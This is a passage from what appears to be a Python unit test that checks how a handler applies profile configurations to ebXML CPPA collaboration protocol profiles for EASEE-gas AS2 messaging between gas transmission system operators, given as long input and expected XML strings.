<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_5_14">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A04</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_6_16">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_6_18">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZUG"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A08</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_7_20">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_7_22">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZUE"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A07</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_8_24">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZUJ"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">N/A</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="N/A" id="ab_9_26">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A04</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_10_28">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_10_30">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZUH"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A11</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_11_32">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZSO"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A08</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_12_34">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_12_36">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A09</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_13_38">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_13_40">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A02</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_14_42">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_14_44">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A06</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_15_46">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_15_48">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A07</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_16_50">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_16_52">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A04</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_17_54">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_17_56">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZSH"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A02</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_18_58">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_18_60">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A09</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_19_62">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A06</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_20_64">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_20_66">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A07</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_21_68">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A04</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_22_70">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="Meter Read"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A02</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_23_72">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="Mark Tr"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A02</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_24_74">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="FACILITY OPERATOR"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A10</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_25_76">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="StorageLNGOperator"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A09</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_26_78">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZTY"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A08</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_27_80">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_27_82">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZTZ"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A08</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_28_84">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_28_86">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZTU"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A02</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_29_88">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_29_90">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A04</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_30_92">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_30_94">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZTT"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A02</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_31_96">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_31_98">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A04</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_32_100">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_32_102">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZTV"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A05</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_33_104">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="Consumer"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A07</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_34_106">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="SU"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A02</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_35_108">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZAA"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A07</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_36_110">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="http://docs.oasis-open.org/ebxml-msg/ebms/v3.0/ns/core/200704/initiator"/>
<cppa:CounterPartyRole name="http://docs.oasis-open.org/ebxml-msg/ebms/v3.0/ns/core/200704/responder"/>
<cppa:ServiceBinding>
<cppa:Service>http://docs.oasis-open.org/ebxml-msg/ebms/v3.0/ns/core/200704/service</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/ebms/v3.0/ns/core/200704/test" id="ab_37_112">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="http://docs.oasis-open.org/ebxml-msg/ebms/v3.0/ns/core/200704/responder"/>
<cppa:CounterPartyRole name="http://docs.oasis-open.org/ebxml-msg/ebms/v3.0/ns/core/200704/initiator"/>
<cppa:ServiceBinding>
<cppa:Service>http://docs.oasis-open.org/ebxml-msg/ebms/v3.0/ns/core/200704/service</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/ebms/v3.0/ns/core/200704/test" id="ab_38_114">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:AS2Channel id="b_ch_send" transport="tr_send">
<cppa:ChannelProfile>http://easee-gas.eu/AS2-Profile</cppa:ChannelProfile>
<cppa:Signature>
<cppa:SigningCertificateRef certId="_SCNXER"/>
</cppa:Signature>
<cppa:Encryption/>
<cppa:ErrorHandling>
<cppa:ReceiverErrorsReportChannelId>b_ch_send_signals</cppa:ReceiverErrorsReportChannelId>
</cppa:ErrorHandling>
<cppa:ReceiptHandling>
<cppa:ReceiptChannelId>b_ch_send_signals</cppa:ReceiptChannelId>
</cppa:ReceiptHandling>
</cppa:AS2Channel>
<cppa:AS2Channel id="b_ch_send_signals" asResponse="true">
<cppa:ChannelProfile>http://easee-gas.eu/AS2-Profile/MDN</cppa:ChannelProfile>
<cppa:Signature/>
</cppa:AS2Channel>
<cppa:AS2Channel id="b_ch_receive" transport="tr_receive" >
<cppa:ChannelProfile>http://easee-gas.eu/AS2-Profile</cppa:ChannelProfile>
<cppa:Signature />
<cppa:Encryption>
<cppa:EncryptionCertificateRef certId="_4UP74O"/>
</cppa:Encryption>
</cppa:AS2Channel>
<cppa:HTTPTransport id="tr_send">
<cppa:ClientIPv4>1.2.3.4</cppa:ClientIPv4>
</cppa:HTTPTransport>
<cppa:HTTPTransport id="tr_receive">
<cppa:Endpoint>https://tso1.eu/as2</cppa:Endpoint>
</cppa:HTTPTransport>
<cppa:PayloadProfile id="edigas">
<cppa:PayloadPart maxOccurs="1" minOccurs="1">
<cppa:PartName>businessdocument</cppa:PartName>
<cppa:MIMEContentType>application/xml</cppa:MIMEContentType>
<cppa:Property maxOccurs="1" minOccurs="1" name="EDIGASDocumentType"/>
</cppa:PayloadPart>
</cppa:PayloadProfile>
<cppa:SOAPWithAttachmentsEnvelope id="entsog_package">
<cppa:SimpleMIMEPart PartName="businessdocument" />
</cppa:SOAPWithAttachmentsEnvelope>
</cppa:CPP>""", self.parser)
result = self.handler.apply_profile_configs(data)
logging.info('Result: {}'.format(lxml.etree.tostring(result,
pretty_print=True)))
expected = etree.fromstring("""<cppa:CPP xmlns:cppa="http://docs.oasis-open.org/ebcore/ns/cppa/v3.0">
<cppa:ProfileInfo>
<cppa:ProfileIdentifier>EASEE-gas AS2 Profile for TSO 2</cppa:ProfileIdentifier>
</cppa:ProfileInfo>
<cppa:PartyInfo xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
<cppa:PartyName xml:lang="en">TSO 2</cppa:PartyName>
<cppa:PartyId type="http://www.entsoe.eu/eic-codes/eic-party-codes-x">21X-EU-B-A0A0A-B</cppa:PartyId>
<cppa:PartyContact>
<cppa:ContactType>Technical Contact</cppa:ContactType>
<cppa:DirectTelephone>+3761234560</cppa:DirectTelephone>
<cppa:Email>edi@tso2.eu</cppa:Email>
</cppa:PartyContact>
<cppa:Certificate id="_SCNXER">
<ds:KeyInfo>
<ds:KeyName>Signing certificate for TSO 2</ds:KeyName>
<ds:X509Data>
<ds:X509Certificate>RGl0IGlzIGVlbiBjZXJ0aWZpY2FhdCBpbiBiYXNlIDY0IGNvZGVyaW5n</ds:X509Certificate>
</ds:X509Data>
</ds:KeyInfo>
</cppa:Certificate>
<cppa:Certificate id="_4UP74O">
<ds:KeyInfo>
<ds:KeyName>Encryption certificate for TSO 2</ds:KeyName>
<ds:X509Data>
<ds:X509Certificate>RGl0IGlzIGVlbiBhbmRlciBjZXJ0aWZpY2FhdCBpbiBiYXNlIDY0IGNvZGVyaW5n</ds:X509Certificate>
</ds:X509Data>
</ds:KeyInfo>
</cppa:Certificate>
<cppa:CertificateDefaults>
<cppa:SigningCertificateRef certId="_SCNXER"/>
<cppa:EncryptionCertificateRef certId="_4UP74O"/>
</cppa:CertificateDefaults>
</cppa:PartyInfo>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZSZ"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A02</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_1_2">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_1_4">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A10</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_2_6">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_2_8">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZHC"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A02</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_3_10">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZUA"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A09</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_4_12">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZUF"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A11</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_5_14">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A04</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_6_16">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_6_18">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZUG"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A08</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_7_20">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_7_22">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZUE"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A07</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_8_24">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZUJ"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">N/A</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="N/A" id="ab_9_26">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A04</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_10_28">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_10_30">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZUH"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A11</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_11_32">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZSO"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A08</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_12_34">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_12_36">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A09</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_13_38">
